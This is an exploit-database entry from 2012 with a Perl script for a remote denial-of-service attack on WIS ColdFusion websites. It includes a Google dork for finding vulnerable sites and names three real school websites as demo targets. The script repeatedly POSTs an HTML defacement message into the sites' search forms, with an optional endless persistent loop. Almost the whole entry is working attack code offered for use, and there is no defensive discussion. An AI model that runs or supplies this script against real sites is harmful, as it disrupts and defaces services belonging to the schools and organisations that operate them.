WIS Coldfusion Exploit



EKU-ID: 2631 CVE: OSVDB-ID:
Author: Noxxie Published: 2012-09-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: [WIS Coldfusion Exploit]
# Date: [9-9-2012]
# Author: [Noxxie]
# Vendor or Software Link: [ http://www.wis.nl/Onze_klanten ] (link that also shows customers , gives an idea of inpact)
# Version: [All versions with search form are affected]
# Category:: [remote dos]
# Google dork: [inurl:/Page/Nctrue]
# Tested on: [linux,windows]
# Demo site: [ http://www.cambium.org/Page/nctrue/sp81/index.html?Search=hello 
http://www.teylingen-college.nl/Page/nctrue/sp2048/Index.html
http://copernicus.atlascollege.nl/Page/nctrue/action=search/index.html 

#!/usr/bin/perl -w
#!/Made By Noxxie Version for Hackflag
use Time::HiRes;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
system("cls");
if ($#ARGV != 3) {
    print "usage: target interval repetitions Persistent\n";
    print "target: link to vulnerable page\n";
	print "interval: interval time in seconds\n";
	print "repetitions: amount of repetitions\n";
	print "Persistent mode (0=off,1=on)\n";
	print "example: http://www.google.nl/vulnerablepage.php 2 1 1\n";
    exit;
}

$target = $ARGV[0];
$seconds = $ARGV[1];
$times = $ARGV[2];
$persistent = $ARGV[3];
$count = 0;
$togo =0;
print " ##    ##  #######  ##     ## ##     ## #### ######## \n ###   ## ##     ##  ##   ##   ##   ##   ##  ## \n ####  ## ##     ##   ## ##     ## ##    ##  ## \n ## ## ## ##     ##    ###       ###     ##  ###### \n ##  #### ##     ##   ## ##     ## ##    ##  ## \n ##   ### ##     ##  ##   ##   ##   ##   ##  ## \n ##    ##  #######  ##     ## ##     ## #### ######## \n ";
print"Loading\n";
Time::HiRes::sleep(0.3);
print"Target: $target\n";
Time::HiRes::sleep(0.2);
print"Target Set\n\n";
Time::HiRes::sleep(0.3);
print"Interval: $seconds Seconds\n";
Time::HiRes::sleep(0.1);
print"Interval Set\n\n";
Time::HiRes::sleep(0.2);
print"Amount: $times Times\n";
Time::HiRes::sleep(0.4);
print"Amount Set\n\n";
if ($persistent == 1) {
print "Persistent mode is ON\n";
print "Use Cntrl+C to abort script\n"
}else{
print "Persistent mode is OFF\n";
print "Script will exit automaticly after task is completed\n"
}
Time::HiRes::sleep(0.1);
Proceed:
$count = $count + 1;
if( $count > $times ){
system("cls");
 print "\n\n\n Job Well Done\n+----------Stats---------+\nTarget: $target\nExploited $times times\nwith an interval of : $seconds seconds\n\n See You laters :D\n\n\n\n";
Time::HiRes::sleep(3.5);
exit;
}else{
goto Flop;
}

Flop:
$togo = $times - $count;
$ua = LWP::UserAgent->new;
my $req = POST $target,
[ search => '<html><head></head><body><h1>Sites die hun content niet goed beveiligen worden gepowened door een stelletje whitehats</h1><br><p><h1>[[/]{{/True Story/}}[/]]</h1></body></html>', errors => 0 ];
print $ua->request($req)->as_string;
Time::HiRes::sleep($seconds);
if ($persistent != 1) {
print "$count Done , $togo times to go \n";
print "\n";
}
if ($persistent == 1) {
goto Flop;
}
goto Proceed;